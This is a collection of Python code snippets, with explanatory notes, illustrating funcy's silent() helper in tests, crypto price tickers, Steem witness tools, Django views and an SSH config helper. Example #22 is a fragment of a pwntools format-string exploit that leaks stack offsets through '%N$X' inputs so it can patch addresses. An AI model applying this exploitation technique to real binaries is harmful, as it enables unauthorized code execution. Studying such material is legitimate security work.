Example #1
def test_3():
    path = 'urls_.yml'
    silent(os.remove)(path)
    with track_function(
            'yaml.load',
            path,
    ):
        yaml.load('a/5/b')
        yaml.load('a/9/b')
        yaml.load('a/3/b')
    assert os.path.exists(path)
    with open(path) as f:
        print()
        print(f.read())
    silent(os.remove)(path)
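A note on the core idiom used throughout these examples: funcy.silent(f) returns a wrapper that calls f, swallows any exception, and returns None instead. A minimal sketch of the behavior the cleanup lines above rely on:

from funcy import silent
import os

assert silent(int)('42') == 42               # success passes through
assert silent(int)('not a number') is None   # exception -> None

# The cleanup idiom from the test: remove the file if it exists,
# and swallow FileNotFoundError if it does not
silent(os.remove)('urls_.yml')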
Example #2
def parse_tickets(text):
    result = {'tickets': {}, 'warnings': []}

    # Parse total number of tickets
    total_s, ticket_s = re.split(r'30\s*000', text, maxsplit=1)
    result['total'] = silent(int)(re.sub(r'\D', '',
                                         re_find(r'[\d\s]+\D*$', total_s)))

    # Parse (nick, ticket count) pairs
    known_names = read_names()
    ticket_pairs = re.findall(r'(\w[\w\d \|]*)\W+((?:\w )?[\doOоО]+\b)?',
                              ticket_s)
    tickets = {}
    for name, count in ticket_pairs:
        # Check if name is known or similar enough to known one
        name, warning = parse_name(name)
        if warning:
            result['warnings'].append(warning)
        if name is None:
            continue

        # Parse number part
        count = parse_number(count)
        if count is None:
            result['warnings'].append('No count for %s' % name)
        else:
            result['tickets'][name] = count

    return result
Example #3
    def sbd_btc_ticker(verbose=False):
        prices = {}
        urls = [
            "https://poloniex.com/public?command=returnTicker",
            "https://bittrex.com/api/v1.1/public/getmarketsummary?market=BTC-SBD",
        ]
        responses = list(silent(requests.get)(u, timeout=30) for u in urls)

        for r in [x for x in responses
                  if hasattr(x, "status_code") and x.status_code == 200 and x.json()]:
            if "poloniex" in r.url:
                with suppress(KeyError):
                    data = r.json()["BTC_SBD"]
                    if verbose:
                        print("Spread on Poloniex is %.2f%%" %
                              Tickers.calc_spread(data['highestBid'], data['lowestAsk']))
                    prices['poloniex'] = {
                        'price': float(data['last']),
                        'volume': float(data['baseVolume'])}
            elif "bittrex" in r.url:
                with suppress(KeyError):
                    data = r.json()["result"][0]
                    if verbose:
                        print("Spread on Bittrex is %.2f%%" %
                              Tickers.calc_spread(data['Bid'], data['Ask']))
                    price = (data['Bid'] + data['Ask']) / 2
                    prices['bittrex'] = {'price': price, 'volume': data['BaseVolume']}

        if len(prices) == 0:
            raise RuntimeError("Obtaining SBD/BTC prices has failed from all sources.")

        return Tickers._wva(
            [x['price'] for x in prices.values()],
            [x['volume'] for x in prices.values()])
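silent(requests.get) turns any request failure (timeout, DNS error, refused connection) into None rather than an exception, which is why the loop above filters on hasattr(x, "status_code") before touching the response. A minimal sketch of the pattern; the URLs are placeholders:

from funcy import silent
import requests

urls = ["https://example.com/", "http://invalid.invalid/"]  # placeholder URLs
responses = [silent(requests.get)(u, timeout=30) for u in urls]
# Failed requests are None, so filter before using the response
good = [r for r in responses if r is not None and r.status_code == 200]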
Example #4
def update():
    """Update witness properties."""
    c = get_config()
    c['witness']['url'] = click.prompt(
        'What should be your witness URL?',
        default=c['witness']['url'],
    )
    creation_fee = click.prompt(
        'How much do you want the account creation fee to be (STEEM)?',
        default=c['props']['account_creation_fee'],
    )
    if silent(float)(creation_fee):
        creation_fee = "%s STEEM" % float(creation_fee)
    c['props']['account_creation_fee'] = str(Amount(creation_fee))

    c['props']['maximum_block_size'] = click.prompt(
        'What should be the maximum block size?',
        default=c['props']['maximum_block_size'],
    )
    c['props']['sbd_interest_rate'] = click.prompt(
        'What should be the SBD interest rate?',
        default=c['props']['sbd_interest_rate'],
    )

    # verify
    output(c, '\nConfiguration')
    click.confirm('Do you want to commit the updated values?', abort=True)

    # update
    set_config(c)
    witness_set_props(c['witness']['url'], c['props'])
    output('Witness %s Updated' % c['witness']['name'])
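silent(float)(creation_fee) works as a did-it-parse test here: it is truthy only when the prompt value is a bare non-zero number, and only then is the STEEM suffix appended. A sketch of the branches, including the falsy-zero edge case:

from funcy import silent

assert silent(float)('0.1') == 0.1           # bare number -> suffix gets appended
assert silent(float)('0.1 STEEM') is None    # already suffixed -> left as is
assert not silent(float)('0')                # parses to 0.0 but is falsy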
Example #5
    def take(self, limit=5):
        """ Take up to n (n = limit) posts/comments at a time.

        You can call this method as many times as you want. Once
        there are no more posts to take, it will return [].

        Returns:
            List of posts/comments in a batch of size up to `limit`.
        """
        # get main posts only
        comment_filter = is_comment if self.comments_only else complement(
            is_comment)
        hist = filter(comment_filter, self.history)

        # filter out reblogs
        hist2 = filter(lambda x: x["author"] == self.account.name, hist)

        # post edits will re-appear in history
        # we should therefore filter out already seen posts
        def ensure_unique(post):
            if post["permlink"] not in self.seen_items:
                self.seen_items.add(post["permlink"])
                return True

        unique = filter(ensure_unique, hist2)

        serialized = filter(bool, map(silent(Post), unique))

        batch = take(limit, serialized)
        return batch
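map(silent(Post), ...) converts each raw item into a Post, or into None when the constructor raises on malformed data; filter(bool, ...) then drops the Nones. A standalone sketch of the idiom, with a hypothetical Item class standing in for Post:

from funcy import silent

class Item:
    def __init__(self, d):
        self.permlink = d['permlink']  # raises KeyError on malformed input

raw = [{'permlink': 'a'}, {'bad': 'data'}, {'permlink': 'b'}]
items = list(filter(bool, map(silent(Item), raw)))
assert [i.permlink for i in items] == ['a', 'b']  # malformed entry dropped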
Example #6
    def steem_btc_ticker():
        prices = {}
        urls = [
            "https://poloniex.com/public?command=returnTicker",
            "https://bittrex.com/api/v1.1/public/getmarketsummary?market=BTC-STEEM",
            "https://api.binance.com/api/v1/ticker/24hr",
        ]
        responses = list(silent(requests.get)(u, timeout=30) for u in urls)

        for r in [x for x in responses
                  if hasattr(x, "status_code") and x.status_code == 200 and x.json()]:
            if "poloniex" in r.url:
                with suppress(KeyError):
                    data = r.json()["BTC_STEEM"]
                    prices['poloniex'] = {
                        'price': float(data['last']),
                        'volume': float(data['baseVolume'])}
            elif "bittrex" in r.url:
                with suppress(KeyError):
                    data = r.json()["result"][0]
                    price = (data['Bid'] + data['Ask']) / 2
                    prices['bittrex'] = {'price': price, 'volume': data['BaseVolume']}
            elif "binance" in r.url:
                with suppress(KeyError):
                    data = [x for x in r.json() if x['symbol'] == 'STEEMBTC'][0]
                    prices['binance'] = {
                        'price': float(data['lastPrice']),
                        'volume': float(data['quoteVolume'])}

        if len(prices) == 0:
            raise RuntimeError("Obtaining STEEM/BTC prices has failed from all sources.")

        return Tickers._wva(
            [x['price'] for x in prices.values()],
            [x['volume'] for x in prices.values()])
Example #7
    def calc_clicked(self):

        time.sleep(1)

        self.browser_visit('dashboard')

        #logging.warn("finding element by xpath")
        elem = self.browser.find_by_xpath(
            '/html/body/table[2]/tbody/tr/td[2]/table/tbody/tr/td[2]/table[2]/tbody/tr/td'
        )

        # The click status box says: <div align="center"><strong><font color="#FFFFFF">Surf Clicked Today: 0<br>You have clicked on 10 ads within the last 24 hours<br>
        # The click status box says: <div align="center"><strong><font color="#FFFFFF">Surf Clicked Today: 6<br>You have NOT clicked on 10 ads within the last 24 hours<br>

        html = get_element_html(self.browser.driver, elem[0]._element)
        find = html.find("You have NOT clicked on")

        print("HTML={0}. Find={1}.".format(html, find))

        if find != -1:
            return -1

        clicked = funcy.silent(int)(
            funcy.re_find(r'You have clicked on (\d+)', html))
        if clicked is None:
            raise RuntimeError("Could not calculate clicked.")
        return clicked
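funcy.re_find returns the first capture group, or None when nothing matches, so silent(int) covers both the no-match and the unparsable cases:

import funcy

html = "You have clicked on 7 ads"
assert funcy.silent(int)(funcy.re_find(r'You have clicked on (\d+)', html)) == 7
assert funcy.silent(int)(funcy.re_find(r'clicked on (\d+)', 'no match')) is None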
Example #8
class Story(Model, Node):
    _schema = story_schema

    def _on_init(self):
        try:
            self._validate()
        except Exception as e:
            print('ERROR in validation for Story:')
            print()
            print(str(e))
            print()
            print(self._yaml())
            print()

    mpd = property(lambda self: get_manifest(self))

    image = property(lambda self: get_image_url(self))

    video = property(lambda self: get_video_url(self))

    __repr__ = lambda self: f'Story(pk={self.pk})'

    location = property(lambda self: fallback(
        lambda: self['story_locations'][0]['location'], lambda: self[
            'story_locations']['location'], lambda: None))

    geotag = compose(
        property, silent)(lambda self: self['story_locations'][0]['location'])

    swipeup_url = property(
        silent(lambda self: self['story_cta'][0]['links'][0]['webUri']))

    spotyfy_song = property(
        lambda self: self['story_app_attribution']['content_url'])
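compose(property, silent) builds a property whose getter returns None instead of raising when the nested keys are missing; the silent(lambda ...) inside property does the same for swipeup_url. A minimal standalone sketch, assuming dict-style item access like Story's:

from funcy import compose, silent

class Record(dict):
    # equivalent to: geotag = property(silent(lambda self: ...))
    geotag = compose(property, silent)(
        lambda self: self['story_locations'][0]['location'])

assert Record().geotag is None                           # missing key -> None
assert Record(story_locations=[{'location': 'x'}]).geotag == 'x'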
Example #9
    def refresh(self):
        post_author, post_permlink = resolve_identifier(self.identifier)
        post = self.steemd.get_content(post_author, post_permlink)
        if not post["permlink"]:
            raise PostDoesNotExist("Post does not exist: %s" % self.identifier)

        # If this 'post' comes from an operation, it might carry a patch
        if "body" in post and re.match("^@@", post["body"]):
            self.patched = True

        # TODO: Check
        # This field is returned from blockchain, but it's empty. Fill it
        post['reblogged_by'] = [i for i in self.steemd.get_reblogged_by(post_author, post_permlink) if i != post_author]

        # Parse Times
        parse_times = ["active",
                       "cashout_time",
                       "created",
                       "last_payout",
                       "last_update",
                       "max_cashout_time"]
        for p in parse_times:
            post[p] = parse_time(post.get(p, "1970-01-01T00:00:00"))

        # Parse Amounts
        sbd_amounts = [
            'total_payout_value',
            'max_accepted_payout',
            'pending_payout_value',
            'curator_payout_value',
            'total_pending_payout_value',
            'promoted',
        ]
        for p in sbd_amounts:
            post[p] = Amount(post.get(p, "0.000 GBG"))

        # calculate trending and hot scores for sorting
        post['score_trending'] = calculate_trending(post.get('net_rshares', 0), post['created'])
        post['score_hot'] = calculate_hot(post.get('net_rshares', 0), post['created'])

        # turn json_metadata into python dict
        meta_str = post.get("json_metadata", "{}")
        post['json_metadata'] = silent(json.loads)(meta_str) or {}

        post["tags"] = []
        post['community'] = ''
        if isinstance(post['json_metadata'], dict):
            if post["depth"] == 0:
                tags = [post["parent_permlink"]]
                tags += get_in(post, ['json_metadata', 'tags'], default=[])
                # deduplicate tags, preserving order
                seen_tags = set()
                post["tags"] = [tag for tag in tags
                                if tag not in seen_tags and not seen_tags.add(tag)]

            post['community'] = get_in(post, ['json_metadata', 'community'], default='')

        # If this post is a comment, retrieve the root comment
        self.root_identifier, self.category = self._get_root_identifier(post)

        self._store_post(post)
Example #10
def test_track_class():
    path = 'urls_.yml'
    silent(os.remove)(path)
    with track_method(
            'xxx.Klass',
            'ciao',
            path,
    ):
        x = Klass()
        x.ciao('a/1/b')
        x.ciao('a/2/b')
        x.ciao('a/8/b')
    assert os.path.exists(path)
    with open(path) as f:
        print()
        print(f.read())
    silent(os.remove)(path)
Example #11
def register_apps(app):
  for pkg in w_utils.find_modules('apps', True):
    pkg_views = '%s.views' % pkg
    objs = [get_module_obj(pkg_views, obj) for obj in ['bpa', 'bp']]
    funcy.walk(funcy.silent(app.register_blueprint), objs)
    app_init = get_module_obj(pkg, 'app_init')
    if app_init:
      app_init(app)
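funcy.walk here is used for its side effect: each candidate object is passed to app.register_blueprint, and silent(...) swallows the failure when get_module_obj returned None for a missing attribute. A sketch with a hypothetical register function standing in for the Flask app:

import funcy

registered = []
register = registered.append          # stand-in for app.register_blueprint

objs = ['bpa', None]                  # None: the views module had no such attribute
funcy.walk(funcy.silent(lambda o: register(o.upper())), objs)
assert registered == ['BPA']          # the None candidate was silently skipped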
Example #12
def log(request, analysis_id):
    analysis = get_object_or_404(Analysis, pk=analysis_id)
    offset = silent(int)(request.GET.get('offset')) or 0

    log_lines = redis_client.lrange('analysis:%s:log' % analysis_id, offset, -1)
    if request.is_ajax():
        return JsonResponse(log_lines, safe=False)
    else:
        return {'analysis': analysis, 'log_lines': log_lines}
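silent(int)(...) or 0 is the parse-with-default idiom: a missing GET parameter arrives as None and a malformed one fails int(), and in both cases `or 0` supplies the default:

from funcy import silent

assert (silent(int)(None) or 0) == 0     # parameter absent
assert (silent(int)('abc') or 0) == 0    # malformed
assert (silent(int)('25') or 0) == 25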
Example #13
def parse_option(string):
    if '=' not in string:
        string += '='
    name, value = re.split('=', string, maxsplit=1)
    if value == '':
        value = False if name.startswith('-no-') else True
    else:
        value = fn.silent(eval)(value) or value
    name = re.sub('-', '_', re.sub('^(-no-|-)', '', name))
    return variables.option._replace(name=name, value=value)
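The fn.silent(eval)(value) or value trick has a subtle edge: a value that evaluates to something falsy (0, '', False) falls through to the raw string. A sketch of the branches, assuming funcy is imported as fn:

import funcy as fn

assert (fn.silent(eval)('[1, 2]') or '[1, 2]') == [1, 2]          # parses fine
assert (fn.silent(eval)('not python!!') or 'not python!!') == 'not python!!'
assert (fn.silent(eval)('0') or '0') == '0'  # falsy result falls back to the string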
Example #14
    def btc_usd_ticker(verbose=False):
        prices = {}
        urls = [
            "https://api.bitfinex.com/v1/pubticker/BTCUSD",
            "https://api.gdax.com/products/BTC-USD/ticker",
            "https://api.kraken.com/0/public/Ticker?pair=XBTUSD",
            "https://www.okcoin.com/api/v1/ticker.do?symbol=btc_usd",
            "https://www.bitstamp.net/api/v2/ticker/btcusd/",
        ]
        responses = list(silent(requests.get)(u, timeout=30) for u in urls)

        for r in [x for x in responses
                  if hasattr(x, "status_code") and x.status_code == 200 and x.json()]:
            if "bitfinex" in r.url:
                with suppress(KeyError):
                    data = r.json()
                    prices['bitfinex'] = {
                        'price': float(data['last_price']),
                        'volume': float(data['volume'])}
            elif "gdax" in r.url:
                with suppress(KeyError):
                    data = r.json()
                    prices['gdax'] = {
                        'price': float(data['price']),
                        'volume': float(data['volume'])}
            elif "kraken" in r.url:
                with suppress(KeyError):
                    data = r.json()['result']['XXBTZUSD']['p']
                    prices['kraken'] = {
                        'price': float(data[0]),
                        'volume': float(data[1])}
            elif "okcoin" in r.url:
                with suppress(KeyError):
                    data = r.json()["ticker"]
                    prices['okcoin'] = {
                        'price': float(data['last']),
                        'volume': float(data['vol'])}
            elif "bitstamp" in r.url:
                with suppress(KeyError):
                    data = r.json()
                    prices['bitstamp'] = {
                        'price': float(data['last']),
                        'volume': float(data['volume'])}

        if verbose:
            pprint(prices)

        if len(prices) == 0:
            raise RuntimeError("Obtaining BTC/USD prices has failed from all sources.")

        # vwap
        return Tickers._wva(
            [x['price'] for x in prices.values()],
            [x['volume'] for x in prices.values()])
Example #15
def time_command(cmd):
    cprint('Timing "%s": ' % cmd, "green")

    # We will collect unbuffered output with timestamps to measure hang ups.
    # Python buffers output when it's redirected, so this is critical.
    output = []
    env = {**os.environ, "PYTHONUNBUFFERED": "x", "COLUMNS": str(get_cols())}
    start = time.monotonic()

    # Execute command with output redirected to pipe and unbuffered
    proc = subprocess.Popen(
        cmd,
        bufsize=0,
        shell=True,
        env=env,
        cwd=_cwd,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )

    # Collect the combined output as it goes
    while True:
        chunk = proc.stdout.read(1024)
        if not chunk:
            break

        output.append((time.monotonic(), chunk))

        sys.stdout.buffer.write(chunk)
        sys.stdout.flush()

    proc.wait()
    end = time.monotonic()

    # Fail loudly and stop the benchmark
    if proc.returncode != 0:
        raise Exception('Command "{}" failed with code {}'.format(
            cmd, proc.returncode))

    total = end - start
    cprint("%s s" % total, "green")

    # from pprint import pprint
    # pprint(output)

    return {
        "total": total,
        "in": output[0][0] - start if output else None,
        "out": end - output[-1][0] if output else None,
        "sleep": silent(max)(r[0] - l[0] for l, r in pairwise(output)),
        "output": output,
    }
Example #16
def get_series_tag_history():
    series_tag_history = {
        'created': defaultdict(int),
        'validated': defaultdict(int),
        'invalidated': defaultdict(int)
    }
    qs = SeriesTag.objects.filter(
        is_active=True).prefetch_related('validations')

    for tag in tqdm(qs, total=qs.count(), desc='series tag history'):
        validations = list(tag.validations.all())
        series_tag_history['created'][ceil_date(tag.created_on)] += 1
        validated = silent(min)(v.created_on for v in validations
                                if v.annotation_kappa == 1)
        if validated:
            series_tag_history['validated'][ceil_date(validated)] += 1
            invalidated = silent(min)(v.created_on for v in validations
                                      if v.agrees_with is not None)
            if invalidated:
                series_tag_history['invalidated'][ceil_date(invalidated)] += 1

    return walk_values(accumulate, series_tag_history)
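silent(min) guards the empty case: min() over an empty generator raises ValueError, so a tag with no qualifying validations simply yields None here:

from funcy import silent

assert silent(min)(v for v in []) is None   # empty sequence -> None, not ValueError
assert silent(min)([3, 1, 2]) == 1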
Example #17
def parse_number(s):
    # Replace all sorts of Os, English and Russian
    s = re.sub(r'[oOоО]', '0', s)
    numbers = re.findall(r'\d+', s)

    # Filter out single digits as noise
    if len(numbers) > 1:
        numbers = [s for s in numbers if len(s) > 1]

    if len(numbers) != 1:
        return None

    return silent(int)(numbers[0])
Example #18
def check_from_class(check_class: type, obj, *checker_args, **checker_kwargs):
    failures = []
    advice = []
    for Checker in get_subclasses(check_class):
        checker = Checker(*checker_args, **checker_kwargs)
        check = checker.do_check
        success = check(obj)
        if not success:
            failures.append(Checker.__name__)
            advice_item = silent(checker.give_advice)(obj)
            advice.append(advice_item)

    valid = not failures
    return valid, failures, advice
Example #19
def init():
    """Add your witness account."""
    account = click.prompt('What is your witness account name?', type=str)
    witness = get_witness(account)
    if witness:
        c = new_config()
        c['witness']['name'] = account
        c['witness']['url'] = witness['url']
        c['props'] = witness['props']
        set_config(c)
        echo('Imported witness %s from its existing settings.' % account)

    else:
        click.confirm('Witness %s does not exist. Would you like to create it?' % account, abort=True)

        c = new_config()
        c['witness']['name'] = account
        c['witness']['url'] = click.prompt(
            'What should be your witness URL?',
            default=c['witness']['url'],
        )
        creation_fee = click.prompt(
            'How much do you want the account creation fee to be (STEEM)?',
            default=c['props']['account_creation_fee'],
        )
        if silent(float)(creation_fee):
            creation_fee = "%s STEEM" % float(creation_fee)
        c['props']['account_creation_fee'] = str(Amount(creation_fee))

        c['props']['maximum_block_size'] = click.prompt(
            'What should be the maximum block size?',
            default=c['props']['maximum_block_size'],
        )
        c['props']['sbd_interest_rate'] = click.prompt(
            'What should be the SBD interest rate?',
            default=c['props']['sbd_interest_rate'],
        )
        c['props']['account_subsidy_budget'] = click.prompt(
            'What should be the account subsidy budget?',
            default=c['props']['account_subsidy_budget'],
        )
        c['props']['account_subsidy_decay'] = click.prompt(
            'What should be the account subsidy decay?',
            default=c['props']['account_subsidy_decay'],
        )
        set_config(c)
        witness_create(c)
        echo('Witness %s created!' % account)
Example #20
def duration(text):
    # The first pattern matches "[HH:]MM:SS"; the second matches free-form
    # Russian durations: "<N> дней <N> часов <N> минут"
    regexes = [
        r'()(?:(\d\d):)?(\d\d):(\d\d)(?:\s|$)',
        re.compile(
            r'''\s* (?:(\d+)\s*д[еньяй.]*)?
                \s* (?:(\d+)\s*ч[ас.]*)?
                \s* (?:(\d+)\s*м[инуты.]*)?
                ()''', re.I | re.X)
    ]
    for regex in regexes:
        m = re_find(regex, text)
        if m:
            days, hours, minutes, seconds = [
                silent(int)(p) or 0 for p in m
            ]
            if days == hours == minutes == 0:
                return None
            return ((days * 24 + hours) * 60 + minutes) * 60 + seconds
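Unmatched regex groups come back as None and the deliberately empty () group as '', and silent(int)(p) or 0 normalizes each to an integer:

from funcy import silent

groups = ('', '02', None, '30')
assert [silent(int)(p) or 0 for p in groups] == [0, 2, 0, 30]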
Example #21
def search(request):
    q = request.GET.get('q')
    if not q:
        return {'series': None}

    exclude_tags = keep(silent(int), request.GET.getlist('exclude_tags'))
    serie_tags, tag_series, tag_ids = series_tags_data()

    q_string, q_tags = _parse_query(q)
    q_tags, wrong_tags = split(lambda t: t.lower() in tag_ids, q_tags)
    if wrong_tags:
        message = 'Unknown tag%s %s.' % ('s' if len(wrong_tags) > 1 else '', ', '.join(wrong_tags))
        messages.warning(request, message)
    if not q_string and not q_tags:
        return {'series': None}

    qs = search_series_qs(q_string)
    if q_tags:
        q_tag_ids = keep(tag_ids.get(t.lower()) for t in q_tags)
        include_series = reduce(set.intersection, (tag_series[t] for t in q_tag_ids))
        if include_series:
            qs = qs.filter(id__in=include_series)
        else:
            message = 'No series annotated with %s.' \
                % (q_tags[0] if len(q_tags) == 1 else 'all these tags simultaneously')
            messages.warning(request, message)
            return {'series': []}
    if exclude_tags:
        exclude_series = join(tag_series[t] for t in exclude_tags)
        qs = qs.exclude(id__in=exclude_series)

    series_ids = qs.values_list('id', flat=True)
    tags = distinct(imapcat(serie_tags, series_ids), key=itemgetter('id'))
    # TODO: do not hide excluded tags

    return {
        'series': qs,
        'tags': tags,
        'serie_tags': serie_tags,
    }
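keep(silent(int), seq) composes the two functions: each GET value is parsed, failures become None, and keep drops the falsy results in a single pass:

from funcy import keep, silent

values = ['3', 'oops', '', '7']
assert list(keep(silent(int), values)) == [3, 7]
# caveat: a literal '0' would also be dropped, since keep filters falsy values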
Example #22
#
# To do this, we will create a symlink to the target binary
# with a large cyclic name, and search for the pattern on
# the stack.
#
symlink = cyclic(0x20)
offset = -1
shell.ln(['-s', binary, symlink])

# Params of (110,120) chosen after letting it run (0,500) once.
# This is just quicker since I'm running it multiple times to dev.
for index in range(110, 120):
    ch = shell.run('python noarg.py ./%s' % symlink)
    ch.sendline('%{}$X'.format(index))
    response = ch.recvline().strip()
    data = silent(unhex)(response)
    if data is None or len(data) != 4:
        continue

    offset = cyclic_find(data[::-1])
    if 0 <= offset < 0x100:
        break

log.info("Found binary name on stack in argument %i at offset %i" %
         (index, offset))

#
# Step 1B
#
# Put the addresses that we want to patch in the name
# of the symlink, and reference them as arguments from
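silent(unhex) turns a response that is not valid hex (the usual case for most stack slots) into None instead of an exception, hence the `data is None` check above. A sketch using pwntools' unhex helper:

from funcy import silent
from pwnlib.util.fiddling import unhex  # pwntools helper used in the loop above

assert silent(unhex)('61616161') == b'aaaa'
assert silent(unhex)('not hex output') is None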
Example #23
def search(request):
    # Save last specie in session
    specie = request.GET.get('specie')
    if specie != request.session.get('specie'):
        request.session['specie'] = specie

    q = request.GET.get('q')
    if not q:
        return {'series': None}

    exclude_tags = lkeep(silent(int), request.GET.getlist('exclude_tags'))
    series_tags, tag_series, tag_ids = series_tags_data()

    # Parse query
    q_string, q_tags = _parse_query(q)
    q_tags, wrong_tags = lsplit(lambda t: t.lower() in tag_ids, q_tags)
    if wrong_tags:
        message = 'Unknown tag%s %s.' % ('s' if len(wrong_tags) > 1 else '',
                                         ', '.join(wrong_tags))
        messages.warning(request, message)
    if not q_string and not q_tags:
        return {'series': None}

    # Build qs
    qs = search_series_qs(q_string)
    if specie:
        qs = qs.filter(specie=specie)

    if q_tags:
        q_tag_ids = lkeep(tag_ids.get(t.lower()) for t in q_tags)
        include_series = reduce(set.intersection,
                                (tag_series[t] for t in q_tag_ids))
        if include_series:
            qs = qs.filter(id__in=include_series)
        else:
            message = 'No series annotated with %s.' \
                % (q_tags[0] if len(q_tags) == 1 else 'all these tags simultaneously')
            messages.warning(request, message)
            return {'series': []}

    series_ids = qs.values_list('id', flat=True).order_by()
    tags = ldistinct(mapcat(series_tags, series_ids), key=itemgetter('id'))

    if exclude_tags:
        exclude_series = join(tag_series[t] for t in exclude_tags)
        qs = qs.exclude(id__in=exclude_series)

    series = paginate(request, qs, 10)

    # Get annotations statuses
    annos_qs = SeriesAnnotation.objects.filter(series__in=series) \
                               .values_list('series_id', 'tag_id', 'best_cohens_kappa')
    tags_validated = {(s, t): k == 1 for s, t, k in annos_qs}

    return dict(
        {
            'series': series,
            'page': series,
            'tags_validated': tags_validated,
            'tags': tags,
            'series_tags': series_tags,
        }, **_search_stats(qs))
Example #24
    def get_replies(self):
        """ Return **first-level** comments of the post.
        """
        post_author, post_permlink = resolve_identifier(self.identifier)
        replies = self.steemd.get_content_replies(post_author, post_permlink)
        return map(silent(Post), replies)
Example #25
    def _try_get_ssh_config_port(user_ssh_config):
        return silent(int)(user_ssh_config.get("port"))
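Here silent(int) collapses both failure modes, a missing "port" key (None) and a non-numeric value, into a single None return:

from funcy import silent

assert silent(int)({}.get("port")) is None                 # key absent
assert silent(int)({"port": "x"}.get("port")) is None      # non-numeric
assert silent(int)({"port": "22"}.get("port")) == 22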
Example #27
            'study_area_description/citable_classification_system',
            'study_area_description/name', 'design_description', 'id')
    data = _dumb_parse(e, keys)
    data['personnel'] = [_parse_agent(el) for el in e.findall('personnel')]

    return data


def _parse_additional(e):
    url = _text(e.find('resourceLogoUrl'))
    if url:
        url = urlparse(url)._replace(path='/archive.do').geturl()

    description = _text(e.find('citation'))
    return {'url': url, 'description': description, 'name': 'Source archive'}


def unlinkify_para(para):
    result = para.text or ''
    for child in para.iterchildren():
        child_text = ''.join(list(child.itertext()))
        child_url = child.attrib.get('url')
        if child_url:
            child_text = '[{}]({})'.format(child_text, child_url)
        result += child_text + (child.tail or '')

    return result


_get_content = silent(attrgetter('content'))
Example #28
def scrape_comments(mongo, batch_size=250, max_workers=50):
    """ Parse operations and post-process for comment/post extraction. """
    indexer = Indexer(mongo)
    start_block = indexer.get_checkpoint('comments')

    query = {
        "type": "comment",
        "block_num": {
            "$gt": start_block,
            "$lte": start_block + batch_size,
        }
    }
    projection = {
        '_id': 0,
        'block_num': 1,
        'author': 1,
        'permlink': 1,
    }
    results = list(mongo.Operations.find(query, projection=projection))
    identifiers = set(f"{x['author']}/{x['permlink']}" for x in results)

    # handle an edge case when we are too close to the head,
    # and the batch contains no work to do
    if not results and is_recent(start_block, days=1):
        return

    # get Post.export() results in parallel
    raw_comments = thread_multi(fn=get_comment,
                                fn_args=[None],
                                dep_args=list(identifiers),
                                max_workers=max_workers,
                                yield_results=True)
    raw_comments = lkeep(raw_comments)

    # split into root posts and comments
    posts = lfilter(lambda x: x['depth'] == 0, raw_comments)
    comments = lfilter(lambda x: x['depth'] > 0, raw_comments)

    # Mongo upsert many
    log_output = ''
    if posts:
        r = mongo.Posts.bulk_write(
            [
                UpdateOne({'identifier': x['identifier']},
                          {'$set': {
                              **x, 'updatedAt': dt.datetime.utcnow()
                          }},
                          upsert=True) for x in posts
            ],
            ordered=False,
        )
        log_output += \
            f'(Posts: {r.upserted_count} upserted, {r.modified_count} modified) '
    if comments:
        r = mongo.Comments.bulk_write(
            [
                UpdateOne({'identifier': x['identifier']},
                          {'$set': {
                              **x, 'updatedAt': dt.datetime.utcnow()
                          }},
                          upsert=True) for x in comments
            ],
            ordered=False,
        )
        log_output += \
            f'(Comments: {r.upserted_count} upserted, {r.modified_count} modified) '

    # We are only querying {type: 'comment'} blocks and sometimes
    # the gaps are larger than the batch_size.
    index = silent(max)(lpluck('block_num', results)) or (start_block + batch_size)
    indexer.set_checkpoint('comments', index)

    log.info(f'Checkpoint: {index} {log_output}')
Example #29
File: ssh.py Project: rpatil524/dvc
    def _prepare_credentials(self, **config):
        self.CAN_TRAVERSE = True
        from sshfs.config import parse_config

        login_info = {}

        try:
            user_ssh_config = parse_config(host=config["host"])
        except FileNotFoundError:
            user_ssh_config = {}

        login_info["host"] = user_ssh_config.get("Hostname", config["host"])

        login_info["username"] = (config.get("user") or config.get("username")
                                  or user_ssh_config.get("User")
                                  or getpass.getuser())

        login_info["port"] = (config.get("port")
                              or silent(int)(user_ssh_config.get("Port"))
                              or self.DEFAULT_PORT)

        if config.get("ask_password") and config.get("password") is None:
            config["password"] = ask_password(login_info["host"],
                                              login_info["username"],
                                              login_info["port"])

        login_info["password"] = config.get("password")
        login_info["passphrase"] = config.get("password")

        raw_keys = []
        if config.get("keyfile"):
            raw_keys.append(config.get("keyfile"))
        elif user_ssh_config.get("IdentityFile"):
            raw_keys.extend(user_ssh_config.get("IdentityFile"))

        if raw_keys:
            login_info["client_keys"] = [
                os.path.expanduser(key) for key in raw_keys
            ]

        login_info["timeout"] = config.get("timeout", _SSH_TIMEOUT)

        # These two settings fine-tune asyncssh to use the fastest
        # encryption algorithm and disable compression altogether
        # (since compression is blocking, it slows down transfers at a
        # considerable rate, and even for compressible data it is
        # extremely slow).
        # See: https://github.com/ronf/asyncssh/issues/374
        login_info["encryption_algs"] = [
            "aes128-gcm@openssh.com",
            "aes256-ctr",
            "aes192-ctr",
            "aes128-ctr",
        ]
        login_info["compression_algs"] = None

        login_info["gss_auth"] = config.get("gss_auth", False)
        login_info["agent_forwarding"] = config.get("agent_forwarding", True)
        login_info["proxy_command"] = user_ssh_config.get("ProxyCommand")

        # We are going to automatically add stuff to known_hosts
        # something like paramiko's AutoAddPolicy()
        login_info["known_hosts"] = None
        return login_info